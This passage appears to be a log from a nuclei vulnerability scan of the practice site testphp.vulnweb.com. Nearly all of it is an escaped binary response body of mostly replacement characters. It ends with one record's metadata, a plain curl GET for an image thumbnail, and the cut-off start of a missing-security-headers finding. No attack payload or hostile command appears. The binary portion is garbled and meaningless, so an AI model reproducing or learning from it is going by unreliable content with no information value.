\\ufffd\\ufffdy!\\ufffd7\\ufffdXث\\ufffd\\ufffd\\n\\ufffdpA\\u0007\\ufffd~C\\u001b\\ufffd*\\ufffd\\u0012\\ufffd\\ufffd\\ufffd*\\ufffd\\ufffd\\ufffdO`)\\ufffd\\u0014\\ufffd[n?\\u000bm\\ufffd\\ufffd\\ufffd_\\ufffd\\ufffdFv\\ufffd\\ufffd\\ufffd@Hls\\ufffd\\ufffd\\ufffdX\\ufffd\\ufffd\\ufffd:\\ufffdu\\u000f\\ufffd\\ufffdݣ\\ufffde.\\ufffd\\ufffd\\\"\\ufffdG\\ufffd#\\u003c7\\ufffd\\ufffd#\\u0004\\ufffd0Mh\\ufffd)\\ufffdq.\\t\\u001dR^\\t\\ufffd\\u0015\\ufffd\\u0017\\ufffd]iڽ\\ufffd\\ufffd-\\ufffd\\u0013,',\\ufffd\\ufffd\\ufffd\\u0018\\ufffd\\ufffd\\u003c\\ufffd;\\ufffd\\ufffdgu\\u001e\\ufffd\\u000e\\ufffd\\ufffd\\ufffd\\ufffdP\\t\\ufffde\\ufffd7*\\ufffd\\ufffd'\\ufffd\\u0000\\ufffd\\ufffd\\ufffdM\\ufffd\\ufffd\\u000cVR\\ufffdLH\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u000c\\u001c\\ufffdˑ\\ufffd\\u0007\\u0015\\ufffdi]=\\u0012\\ufffd+.X\\u00101\\ufffd\\ufffd\\ufffd9\\u0003۵f\\ufffd\\ufffdI\\ufffd\\ufffd\\ufffd\\ufffd\\u0005\\ufffd\\ufffdMa\\u001cg\\ufffd\\ufffdM\\ufffd^\\ufffdkp1$M\\ufffd\\ufffd\\u0010\\u000f\\ufffd\\u0019\\u0000\\ufffd\\ufffd\\u0011\\ufffd\\\"\\ufffdWV\\ufffd/OEu%\\ufffd\\u0017\\u0010\\ufffd,\\ufffdݸ\\u003ep0\\ufffdl\\ufffd\\ufffd\\u0003 \\ufffd\\\\v\\ufffd\\ufffd=K\\ufffdE\\ufffdot\\ufffd\\ufffd\\ufffd[iZ3\\ufffd\\n\\ufffd\\u0001\\ufffd\\ufffd\\ufffd\\ufffd\\u001f\\ufffd\\ufffdE\\ufffd\\ufffd\\ufffd;rS\\ufffd\\ufffd[-ԥ*\\ufffd\\u0008\\ufffd)@\\nR\\ufffd\\u0000\\ufffd)@\\nR\\ufffdDŽ\\ufffd\\u001a\\ufffd\\ufffd\\ufffd\\ufffdx\\ufffd\\ufffd\\u0012\\ufffd\\ufffd६\\ufffdC ~1\\ufffd\\u001c烐p1ۜT:\\ufffdEzx;,xHt \\ufffd\\ufffd\\ufffd/\\ufffd\\ufffd[T\\ufffd\\ufffdOan\\ufffd\\ufffd\\u0014\\ufffd6]FH \\ufffd\\ufffd~\\u000e\\ufffd\\ufffd\\ufffd\\ufffdJi\\ufffd\\ufffd\\u0014\\ufffd\\ufffdj;\\ufffd\\ufffd\\ufffdOW\\ufffd\\u001f\\ufffd\\u001f53\\ufffd\\ufffd4\\ufffd\\ufffdn$\\ufffd\\ufffd9\\u0012eo0\\ufffd`\\ufffdb\\ufffd9\\u0001\\ufffd#,\\ufffd\\ufffd\\u0004\\ufffd\\ufffdY\\ufffd\\ufffd\\ufffd\\ufffd.\\u0012g\\ufffd[{\\ufffd\\\\1\\u000c\\ufffd\\ufffd\\u0000\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdazj\\ufffd\\ufffd\\ufffd\\ufffd-\\u003e\\ufffd\\ufffd\\ufffdMa\\ufffd\\ufffd\\u0011\\ufffdꚽ\\ufffd\\ufffd\\u0018f\\ufffdG\\ufffdq\\u0012\\u0026\\ufffd\\u00263\\ufffd\\ufffdQ\\ufffd0T\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdE\\ufffd[^\\ufffdIs\\ufffdtp\\ufffd[1\\u000c{\\ufffd\\r\\ufffd\\ufffd~\\u0004\\ufffd\\u0000z\\ufffd5\\ufffdG\\u0012eG\\ufffd:\\ufffd@8'\\ufffd\\u001e@\\ufffd \\u0001\\ufffd\\ufffd\\u0000H\\ufffd\\\\6\\ufffd\\ufffd\\ufffd\\ufffd8\\ufffd\\ufffd \\ufffd\\u001c\\ufffdƌz\\ufffd\\ufffd;\\ufffd\\ufffd1\\ufffdy\\ufffd\\ufffd\\u0013\\\\\\ufffd=\\ufffd\\ufffd\\ufffd\\n*\\\\~ÝUJO(\\ufffdZD!\\u0002$\\ufffd\\ufffde\\ufffd\\u000eCn\\u001fF\\u001c\\u001fʯ\\ufffdt\\ufffdw\\ufffdK\\u001cc\\u0002u-\\u001b\\ufffd68\\ufffd\\u0019?\\\\sߜ\\ufffdqY\\ufffd\\ufffd\\ufffd$\\ufffd\\ufffd\\ufffd뱉b\\n\\ufffd\\ufffd\\ufffd\\u003e~\\ufffdZ\\ufffd\\ufffd8S\\ufffdQ\\ufffd\\ufffd\\ufffds\\ufffdU;z\\ufffd\\ufffd\\ufffd\\ufffd̙(\\ufffd\\ufffd[\\ufffdX]DV\\u001b\\ufffdW}\\ufffd\\u0002\\\\\\u0000\\t\\u001c\\u001e\\ufffd\\ufffd\\ufffd\\u0008\\ufffdY\\ufffd\\ufffdh\\ufffdF\\ufffd\\ufffd\\n4\\ufffd\\ufffda\\ufffd\\ufffd8\\ufffdl\\ufffd\\u001e;\\ufffd\\u0013\\ufffd*\\ufffd5\\ufffd\\ufffd^-\\ufffd\\ufffd3\\ufffd\\u0001 pO\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdk\\u0003\\u0018\\ufffdn#B\\u0019J\\ufffd\\u003c\\ufffd\\u001e\\ufffd\\ufffd]F\\ufffd\\ufffd/\\ufffd'zQ\\ufffd\\ufffdd\\ufffd0\\\\}\\ufffdy\\u001b|ou4H\\u0013\\ufffd\\ufffdY\\ufffdg#\\ufffd\\ufffd3\\\\\\ufffd\\ufffd$\\ufffd\\u0017\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdA\\\"G\\ufffdZ\\ufffd\\ufffd1\\ufffdy\\ufffd\\u00267\\ufffd\\ufffd\\ufffd3\\ufffd\\u0000\\ufffd}\\ufffd\\ufffd.\\ufffd\\ufffd\\ufffdNH\\ufffd\\ufffd0\\ufffd\\r\\ufffdg\\t\\ufffdL\\u0012\\u0000\\ufffd\\ufffd\\ufffdX\\u000f\\ufffd\\u001e\\u001f\\ufffd\\ufffd\\ufffdؠ\\ufffd\\ufffd\\u001e\\ufffd\\u000c\\ufffdu\\ufffd\\ufffdp\\ufffd\\ufffd\\u000c\\ufffd\\ufffd\\u0014\\ufffd\\\\\\ufffd\\ufffd\\u0007\\u0007\\u0018=N\\ufffd\\ufffd#\\ufffd\\ufffdE\\ufffd\\ufffd/)\\ufffd\\ufffd\\ufffd7\\ufffd{\\u000c.N \\ufffdJԬ\\ufffd\\ufffdo\\ufffd,\\ufffd#1\\ufffd\\ufffd\\ufffd\\ufffdJ\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd*-zj\\ufffdtr\\ufffd*\\ufffdA\\\"\\ufffd\\ufffd\\ufffda\\u0013\\ufffd\\\"\\ufffd\\u000e\\u000b\\u0000\\t\\u0000\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd@\\nR\\ufffd\\u0000\\ufffd)@\\nݽ\\u0019\\ufffd\\u000e\\ufffd\\ufffdtJi7\\ufffd;\\u000f\\ufffd\\u0008\\u001d\\u0004W6Q\\ufffd^bn\\u001b\\ufffd\\ufffdr\\ufffd\\u0000\\u0001݇\\u000cG\\ufffdq\\ufffd\\ufffd*U}N\\ufffd\\ufffdTT-YI\\ufffdt\\u0026\\ufffd\\ufffd\\u0013\\ufffdn\\ufffd\\ufffd\\ufffd7\\ufffdtKy\\ufffdn-\\ufffd%x\\u0004\\ufffd\\u0008Ϩ\\u000c.C\\u0002\\u0000ʳ\\u0005$pH8\\ufffd\\u0008[\\ufffd\\ufffd\\\"]\\ufffd-\\ufffd\\ufffd\\ufffd,\\ufffdr-\\\\\\u0004i\\ufffd\\ufffd#.Oel\\u0010\\u001b\\ufffd;O#\\u0019\\ufffdO\\n\\ufffd@\\ufffd\\ufffd}n9\\ufffd.\\ufffd\\u000f i\\ufffd\\u0007\\ufffd\\ufffdo\\ufffd\\u0003\\ufffd\\nϺ\\ufffd\\ufffd[\\ufffdg\\ufffd4\\ufffdm\\u003c\\ufffd:\\ufffd\\ufffdY\\ufffd\\ufffd+mf\\ufffd\\ufffd\\ufffdn\\ufffd\\u0015\\ufffdM\\ufffd\\ufffdFw\\ufffd\\ufffd\\u0007z\\ufffd_\\ufffdŰԿq\\ufffd1\\ufffd\\ufffd\\u001f,y-\\ufffd\\ufffd\\ufffd[\\ufffd\\ufffd}2\\ufffd\\u0005 x\\ufffdQ\\u003cBkq'\\u000f\\ufffd\\u0003r\\ufffd\\ufffd\\ufffdI\\u0003\\u001f\\u0004|\\u001a\\ufffd%\\ufffdb΀\\ufffd\\u0007'\\ufffd\\ufffd.\\ufffd\\ufffdg\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdݕ\\ufffd\\ufffd\\ufffd\\ufffd\\u0015i!\\ufffd+\\ufffd1\\ufffd\\u0001\\u000e\\ufffd%\\ufffd\\u0018\\ufffd\\ufffd\\ufffd\\ufffdF+=\\ufffdb\\ufffd\\ufffd1ナ\\ufffdYMt݋\\ufffd\\ufffdș\\ufffd\\u0019Dt\\ufffd\\ufffd\\u0014\\\\\\ufffd\\u000e_fcRC}x\\ufffd\\u000fDZ\\ufffd\\u003e\\ufffd\\rݵմ\\ufffdkr\\ufffd\\u0016\\ufffd\\ufffd\\u0000ψ\\ufffd\\ufffd^0Ɂ\\ufffd\\\\\\u0013\\ufffd\\u00169\\u003c\\ufffd\\u0001W8\\ufffdY\\ufffdz\\u0015\\u003c\\ufffd;Np\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdU\\u0003\\ufffd\\u0004\\u000eǸ\\ufffd\\ufffdДc?W\\u0001\\ufffd\\ufffd\\\"\\ufffd\\\\%\\ufffd@\\ufffd\\ufffd'\\u0001\\ufffd\\ufffdʺ\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd=\\ufffd\\u0000\\u001a\\ufffdP\\ufffd\\ufffd7\\ufffd\\ufffd\\u001f\\ufffd \\ufffdK;\\ufffd\\ufffd\\u001c\\ufffd\\ufffd\\u0006\\t\\\\z\\ufffd\\u0017\\ufffd\\u0005\\ufffd\\ufffd0\\ufffd\\ufffdrx\\u0018\\u0019\\ufffdn)\\ufffdM\\ufffd\\ufffd_\\ufffdG\\\"5\\ufffdI%\\ufffd\\ufffd\\t\\u0002V\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdqT\\ufffd\\ufffd/,\\u000e\\ufffd\\u0019]C\\ufffd\\u0003\\ufffd\\ufffd\\n\\ufffd\\ufffd\\u0003R\\ufffd\\ufffd\\ufffda\\u0001\\u0016\\ufffd\\u0014h\\ufffdE\\ufffd\\ufffd1\\u0004\\ufffdp\\u000f\\u001f8\\ufffd\\ufffdQU\\\\\\ufffd\\ufffd\\u0016^E\\ufffd74w\\ufffd\\ufffd\\u0010\\ufffdp\\ufffdsG\\ufffdb\\ufffd\\u0015\\u0001fE?˺\\u0000\\u0000\\ufffd\\ufffd\\ufffdl\\u0000\\u0003\\u001e;\\u0006\\ufffd\\ufffd.\\u0003ᯄ6\\ufffd\\u00163[u\\ufffd\\ufffdMQ\\ufffd%b\\ufffd\\ufffdhT*\\ufffd0R;\\ufffd'\\ufffd\\ufffd\\\\`溺\\ufffd\\u0000$\\ufffd\\ufffd\\u003c\\ufffd(0\\ufffd\\u0018\\ufffd\\u0000|`\\ufffd\\ufffdU\\ufffdP\\ufffd\\ufffd]ķ\\ufffd!\\ufffdB\\ufffd\\u003e0T\\ufffda\\t\\ufffd\\ufffd\\u0019\\u001e\\ufffd\\u0000\\u0011\\ufffdgAG]\\ufffdQ\\ufffd\\ufffdf\\ufffd\\ufffd\\ufffd\\u0000RǏ\\ufffd\\ufffd\\\"\\ufffd\\u001c\\ufffd\\ufffd5~\\ufffd\\ufffdt\\ufffd\\ufffdM\\ufffd6\\ufffd\\ufffd$p\\ufffd\\ufffdI\\ufffd\\ufffd+\\ufffdm\\ufffd\\u000c\\u0002{\\ufffdx\\ufffd\\ufffd9\\u000bZ\\ufffd.\\ufffdmR\\ufffdO\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdr\\ufffd\\ufffd\\ufffd\\u003c\\u0010\\u000e\\u0008\\ufffd}\\rz;\\u000cP\\ufffd\\u001cN\\ufffddP7F㜃\\ufffd\\ufffdpG\\ufffd\\ufffd\\\\\\ufffd\\ufffd'|5\\ufffdL\\u000f\\ufffdZ4\\u0011\\ufffd\\ufffd)k\\ufffd\\ufffd\\ufffd\\ufffdI\\ufffd#.J\\ufffdz\\u0007$\\ufffd=9\\ufffd8\\u0002\\ufffd~\\ufffdu\\ufffd\\ufffdt^\\ufffd\\ufffd\\u001f_\\ufffd3Q\\u00055\\ufffd\\ufffd\\ufffd\\\\\\ufffd)[€\\ufffd)@\\nR\\ufffd\\u0000\\ufffd)@\\u001d5\\ufffd7\\ufffdK'H\\ufffd\\u001a\\ufffd\\ufffd\\ufffd}.O9\\u001eFr\\u0004\\u001d\\ufffd*\\ufffd\\u000b(\\ufffd\\r\\ufffd\\ufffdv\\u001c1\\u003co\\ufffd\\ufffdEK[\\ufffd\\ufffd\\ufffd\\ufffd1R$i\\u000b\\u0015\\ufffdc@\\ufffd\\ufffd\\ufffd\\ufffd\\r\\ufffd\\ufffd\\ufffd\\u001c\\ufffd\\n\\ufffd\\ufffd@\\ufffdnt]R\\u001b\\ufffd6ı\\ufffd\\ufffḑ\\ufffdS\\ufffd\\ufffdEu\\ufffd\\ufffd\\ufffd\\ufffd%\\ufffd\\ufffdq̗\\ufffd\\ufffdл\\u001c\\u0003\\ufffd$\\ufffd\\u0019\\ufffd\\ufffd)\\ufffd\\ufffd\\u000c\\ufffd\\rb\\ufffd\\ufffd\\ufffd**WU\\ufffd\\ufffd\\ufffdOgz\\ufffdf\\ufffdԄ\\ufffd\\ufffd\\ufffd\\ufffd\\u001d\\ufffd\\ufffd-\\u003c *\\ufffd\\ufffd\\u0000d1\\ufffd\\ufffd\\u0014c\\u003c\\u001f\\ufffdq\\ufffd\\ufffd\\ufffd\\ufffdj\\ufffd\\ufffd\\ufffdIm$\\ufffd\\ufffd:\\u000f0\\u0014V_Ab\\u0007\\ufffd\\ufffd\\u0004\\u0015*W$\\ufffd\\ufffd\\ufffd\\ufffdZ\\ufffd\\ufffd\\ufffd\\ufffd;M\\u0006\\ufffdSYLRYrʌ]\\ufffd\\ufffd\\u0014\\u000e\\u0007\\ufffd\\ufffd\\u00198\\ufffd\\t\\ufffdlU\\ufffdÿ\\u0013\\ufffd\\ufffd\\ufffdd\\ufffd\\u0013ej\\ufffd\\ufffd\\ufffde\\ufffd\\ufffd\\ufffd\\u001f\\ufffd\\ufffd\\u0000\\u0018e*\\ufffd6{z\\u0018}\\ufffd\\u000e\\u001d\\u001d3U\\n%j_-\\ufffd\\ufffd\\u0000G\\ufffd4\\ufffd2\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd1\\ufffd\\ufffdbIc\\ufffdf\\u0001ܣ%\\u001aA\\ufffd'\\ufffdRN\\u0014\\n\\ufffdb\\u003eߤ\\ufffd\\ufffd\\ufffd\\u003eZ2\\ufffdg\\u0008\\ufffd\\ufffdr\\ufffd\\ufffdr\\n\\ufffd#\\ufffd\\ufffd\\ufffd-N\\ufffd\\ufffd\\ufffd\\t\\ufffdl\\ufffd2\\ufffdBF\\u000f\\ufffd\\u0011\\ufffdE}i\\ufffd\\ufffd'\\ufffd\\ufffdܬ2yh\\ufffd\\ufffdlM\\ufffd\\ufffd\\ufffd\\ufffd@?\\ufffd\\u000f\\u001d\\ufffd\\ufffd)O\\ufffd\\u0012\\ufffd\\\"4\\ufffd\\ufffd\\u0017\\u000b4A\\ufffdӆ(\\ufffdN@e$0\\u0007\\u0003 \\u0010Goj4\\ufffd\\u0000b\\ufffd\\ufffdW\\u0002\\t1\\ufffdg\\u003cq\\ufffd\\ufffd?\\u000b\\ufffd1\\ufffd\\ufffd\\ufffdN\\u0013\\ufffd\\ufffdX\\ufffd\\ufffd\\ufffd8\\u000e\\ufffd\\ufffd1\\u001a\\ufffd\\u0007\\ufffdrs\\ufffd\\ufffd\\u0000J\\ufffd4{\\ufffd{eNy\\ufffd\\ufffd\\u0000l\\ufffd\\ufffd\\ufffdN\\ufffd'\\r\\ufffd\\ufffdڟ%\\ufffd\\ufffd9?\\ufffd\\\\H\\ufffd\\ufffd樑d\\u000e\\ufffdy\\ufffdvc\\u0018\\ufffdl\\u001eC\\u000c\\ufffd\\ufffdc?\\ufffd\\ufffdu\\u0017\\ufffd:\\ufffd\\u0018\\u0015 \\ufffd\\ufffd\\ufffd9\\u0007\\ufffd\\ufffd\\ufffd\\ufffdE\\ufffd\\ufffdh\\ufffdf\\ufffd\\ufffdN\\ufffd? g\\ufffd##\\u003e٩v\\ufffd)q\\n\\ufffd\\u0013\\u0006\\u000c\\ufffd\\ufffd\\u001d\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd9+\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd5\\ufffdأ%\\ufffd\\ufffd}\\ufffd\\u0018\\u0000x݁uw\\u003cr2\\ufffdy\\ufffd\\u0019\\ufffd܏bI0z\\ufffdN\\ufffdR\\ufffd\\ufffd\\ufffdh\\ufffd{gc\\ufffdG*\\ufffd\\ufffd\\ufffdF\\u0018!\\ufffd\\u000er;\\u000c\\ufffd\\ufffdo\\ufffd!\\ufffdX\\ufffd\\ufffd\\ufffdv\\ufffd\\u0000\\ufffd\\u0003\\u0003;\\ufffd d\\ufffd\\u0000H'\\u0007\\ufffd\\ufffdy\\u0014Yb\\ufffd\\ufffd\\ufffd\\ufffd/\\u001f\\ufffd\\ufffd\\ufffd\\u0016\\ufffd\\ufffd\\ufffd\\ufffdBj:O^\\ufffd\\ufffd\\ufffd\\ufffdks~\\ufffd\\ufffde\\ufffd\\ufffd\\u000b\\ufffd\\ufffd\\u000c7#\\ufffd\\u0001\\ufffdOr\\u0006\\u0001\\u000c=\\ufffd\\ufffdֽ\\u0019\\ufffd\\ufffdeݬ\\u001a\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdȌ\\u001d\\u001cP\\u000c?\\ufffdO\\u0004w\\u0007\\ufffdA=ܶV\\ufffdk\\ufffd$\\ufffd \\ufffd\\ufffd\\ufffdCi+\\u0016$$\\ufffd\\u0017\\ufffd9\\u003e\\ufffd\\u0019\\u001c\\u000c2ջ\\ufffd.\\ufffd\\ufffd\\ufffdΓ\\ufffdѵ+cotS̷\\ufffd\\u001b\\\\E0\\ufffd\\n\\ufffd3\\ufffd0r\\u0001*\\ufffd\\ufffd\\ufffd6\\ufffdj\\ufffd\\ufffd\\\\m\\ufffd\\ufffd\\u001e\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd^zd\\ufffd\\ufffd\\ufffd\\ufffdVs\\ufffdx[\\ufffd\\ufffde\\ufffd\\ufffduu\\ufffdI\\ufffdm8o\\ufffdt\\ufffd\\u0018\\ufffd\\ufffd\\ufffd\\t\\ufffd̀\\u001eX\\u000c.\\u0018\\u001c\\u0015l`ղ\\ufffd\\ufffd\\ufffdY\\ufffdI\\ufffd\\n\\ufffd.\\u003c\\ufffdR\\ufffd \\ufffd\\ufffd\\ufffd\\u0000+$鞮\\ufffdzz\\ufffdh\\ufffdXs\\ufffdE\\ufffd\\ufffdS\\u00122G\\u003e\\ufffdc\\ufffd\\ufffdt\\ufffd\\ufffd\\u0011\\ufffdĖP\\ufffd\\ufffd\\ufffd\\u0026˩\\ufffdM\\u0014\\ufffd\\ufffdw\\u003c\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd,\\t\\ufffd\\u003e\\ufffd\\u0000P)\\ufffdj7:N\\ufffd\\r唅'\\ufffd\\ufffd\\u0003\\ufffd~\\ufffd\\ufffdj\\u0015)ZMa\\ufffd\\ufffd:\\ufffd\\ufffdz\\ufffd\\u0014\\ufffdi.\\r\\ufffd0\\ufffd\\ufffdb\\ufffd6\\ufffd.~\\ufffd\\u0012I\\ufffd\\ufffdϾs\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd[\\ufffdV\\r\\ufffd\\ufffd\\ufffd˒\\ufffd\\u0016%s\\ufffd\\u003c\\ufffd\\ufffd\\ufffd5\\ufffd\\ufffd\\ufffd\\ufffd\\\\\\ufffdG\\ufffd7NH\\ufffd\\ufffdw\\ufffd\\ufffd\\ufffd\\u003cՌ\\u003eF@,\\ufffdw\\u0003\\ufffds\\ufffd9\\\"\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd=jd\\u0026W\\ufffd\\ufffdԏ1\\ufffdm\\ufffd\\ufffdڟ@\\ufffd\\ufffdܱ\\ufffd\\ufffd\\u0005\\ufffd4\\ufffd\\ufffdl\\ufffdQ\\ufffdK)\\ufffd|c\\ufffd:TNV\\ufffd\\u0026f)\\u0000:\\ufffd\\ufffd\\u000c9\\ufffd\\ufffd\\u0003\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u000f|\\ufffd\\ufffdH\\ufffd\\ufffdKx\\ufffd9\\ufffdYa\\ufffd\\u000c\\ufffdT\\ufffd\\ufffd.J\\ufffd\\ufffd]\\ufffd%\\ufffdw\\ufffd|\\ufffd\\u00260\\ufffdw\\u0003\\ufffd\\u000foҲ\\ufffd\\u000eܢ\\ufffdc\\ufffda\\ufffd\\\\SP\\ufffd\\ufffd\\u0011$2\\ufffd\\ufffd7\\u001b\\ufffd\\ufffd|~+\\u001b\\ufffd\\ufffd[[\\ufffd\\ufffd\\ufffd\\ufffd0$\\ufffdô\\u0010s\\ufffd~y\\ufffdg\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd-/\\ufffd\\ufffd_4D\\ufffdޑ\\ufffd\\ufffd\\ufffd9\\ufffd\\ufffd@\\u001f#\\ufffd\\ufffdS5m@\\\\\\ufffd\\u001e\\ufffd0ϸ\\ufffd2\\ufffd\\ufffd($\\ufffd\\ufffd}\\ufffd\\ufffd\\ufffdN\\u001a\\u0019S-\\ufffdc\\ufffd\\ufffd62\\ufffd5\\ufffdV\\ufffdt\\ufffd\\ufffd\\ufffdVR\\ufffd\\u0019\\ufffd~\\ufffdF\\u0008 \\ufffd`\\ufffdԻ=v\\ufffd\\ufffd\\ufffdV2\\u003c\\ufffd\\u0002\\ufffdbA\\ufffd\\ufffd\\u00001' \\ufffd\\u00003ܑ\\ufffdyƓ\\ufffd\\ufffdR\\ufffdU\\ufffd\\u001d\\ufffd\\ufffd\\u0018\\ufffdE\\ufffd\\ufffd9ܟ\\ufffd\\u0003۱\\ufffd\\ufffd\\ufffd\\ufffdT=T\\ufffdƭ\\ufffd\\ufffdRyU7\\ufffd*\\ufffd\\ufffd\\tu\\u0005\\ufffdG\\u0003qQ\\ufffd\\ufffd\\ufffdƬˢO\\ufffde\\ufffd\\ufffd\\u0010\\ufffd\\ufffd\\ufffdQ\\ufffd:\\ufffd\\ufffd5\\ufffds\\ufffdF\\ufffdl\\ufffd\\u0008#\\ufffd\\u000fЃ\\ufffd\\ufffd\\ufffd\\ufffdZMom\\ufffd\\ufffds2\\ufffd\\ufffd}\\ufffd\\ufffd\\ufffd`\\u001229\\ufffd\\u0008\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd#\\ufffd\\ufffd{v\\ufffd\\u001c\\ufffd\\ufffdV\\ufffd\\u0018u#\\ufffd\\ufffd@\\ufffd\\ufffd\\\\\\ufffd\\ufffd_X\\ufffd\\ufffdRА;\\\\+\\ufffdY\\ufffd}\\u0003\\ufffd\\ufffd\\u001c\\ufffd\\ufffd+\\ufffd\\ufffd*N\\ufffd\\ufffd\\ufffd)\\ufffd\\ufffd\\ufffd?an\\ufffdW\\u0013lx\\ufffd\\ufffd/\\ufffd\\ufffd\\u0017\\ufffd\\ufffd\\ufffdt\\ufffdwD4N\\ufffd\\ufffdI\\ufffd\\u001d\\ufffd\\ufffd\\ufffd\\u001d\\ufffd@? v\\ufffd\\ufffd\\ufffdr9\\ufffd\\ufffd\\ufffd\\u0000\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdו\\ufffd\\ufffd\\ufffd7%\\ufffd9\\ufffd\\ufffd5N\\ufffd=?\\ufffdס\\ufffd\\ufffd~Ne\\ufffd\\ufffd\\u001eX\\ufffd)Wȅ)J\\u0000R\\ufffd\\ufffd\\u0005)J\\u0000\\ufffd\\ufffd^ɧjVװ\\ufffd2[Ȳ\\ufffde\\u000c\\t\\u00078 \\ufffd\\u0008\\ufffd\\u0011\\ufffd\\ufffd۾\\ufffd\\ufffdP\\ufffdM\\ufffdFb\\ufffdH\\ufffd\\ufffd\\u000b\\ufffd\\\\+/\\u0003\\ufffd\\u000e\\t\\ufffd\\u0013\\ufffd\\ufffd\\ufffdj\\ufffdtް\\ufffd,\\ufffd\\ufffdk\\u0015t{kv-\\u0018 \\ufffd\\\\\\ufffd\\u0006\\ufffd\\u0012H\\ufffd\\u0026\\ufffd\\ufffd\\ufffd\\u0004un2\\ufffd\\ufffd\\ufffdznu\\ufffd\\ufffd}#]\\u000f:\\ufffd\\ufffd=9a\\ufffd~ď\\ufffd\\u001a\\ufffd\\ufffdj\\ufffdV\\ufffd\\ufffd\\ufffdʪ\\u00103\\ufffd\\ufffd\\u0006I\\u001e\\ufffd\\ufffd{r\\u0007\\u0015\\ufffd4\\u001dXKio{lΚh\\ufffd\\ufffd)%\\u001e\\ufffd\\u0018\\ufffd\\ufffd\\u001d\\ufffd\\u001c\\u0015\\ufffd\\ufffdc\\ufffd\\ufffd\\ufffd\\u001da\\u0016\\ufffdu\\u0004s\\ufffdC\\u0018\\u000b$C'w\\ufffd\\u0004\\ufffd\\ufffdn\\r\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0014]\\ufffd\\ufffdG,\\ufffdu7_ZOc\\u0006\\ufffd\\u0010H\\ufffdl\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd s\\ufffd\\ufffd\\u001fp\\u0006@'\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdK4\\u0010\\ufffd{\\u0015IJ@]\\ufffd\\u0016\\u0000m\\ny\\ufffd8\\u0018\\ufffd\\ufffd\\ufffd\\u001a\\ufffdɼ\\ufffd.n\\ufffd\\ufffd3J\\ufffd\\u0015\\ufffd\\ufffdI\\ufffd\\ufffdQ\\ufffd\\ufffd\\ufffd#\\ufffdԸ\\ufffdり\\ufffdY\\ufffdz\\ufffd\\u000b\\ufffd\\ufffd\\ufffd}F\\ufffd\\u0012\\u001a7\\ufffd\\ufffdubC\\ufffd\\ufffd\\ufffd\\ufffdx8\\ufffd\\ufffd8\\ufffdZ.\\ufffd\\ufffd\\ufffdv\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd[\\u001fO\\ufffdI\\u000c\\ufffd\\ufffdF\\ufffd\\ufffd \\ufffd#\\ufffd\\u0013\\ufffdV\\ufffdU\\ufffd\\u0008\\ufffd\\ufffdcn\\u0008\\ufffd\\ufffd\\ufffdrX\\ufffd\\ufffde\\ufffd\\ufffd|\\ufffd=\\ufffd\\ufffdA\\ufffd(PB\\ufffd\\ufffdm\\\\\\u001eG\\n\\ufffd\\ufffd\\ufffd'\\u0000V\\ufffd\\ufffd\\rA\\ufffdMf\\ufffd\\ufffd\\ufffdw\\ufffd!*\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd[\\ufffdQU\\ufffd\\ufffd\\ufffd\\ufffd\\u0016\\u0007J\\ufffdK\\ufffdJR\\ufffd\\u0018)JP\\u0002\\ufffd\\ufffd\\u0000)JP\\u0002\\ufffd\\ufffd\\u0000)JP\\u0006ᖳq\\ufffd\\ufffd]?%\\ufffd\\ry\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd \\ufffd\\u0008\\ufffd;f\\ufffd\\ufffd\\ufffd\\ufffdf\\ufffd\\ufffdۉ\\ufffd\\n\\ufffdY\\ufffd\\ufffd4\\ufffd\\ufffd\\ufffdX\\ufffdQ\\ufffdN\\u0000\\ufffd$\\ufffd\\ufffdiJ\\ufffd\\u0018\\ufffds\\ufffd\\ufffdHߤ\\ufffdҔ\\ufffd$b\\ufffd\\ufffd\\u0000)JP\\u0002\\ufffd\\ufffd\\u0000\\ufffd\\ufffd\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:40.865628302Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko/20100101 Firefox/24.0' 'http://testphp.vulnweb.com/pictures/6.jpg.tn'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security 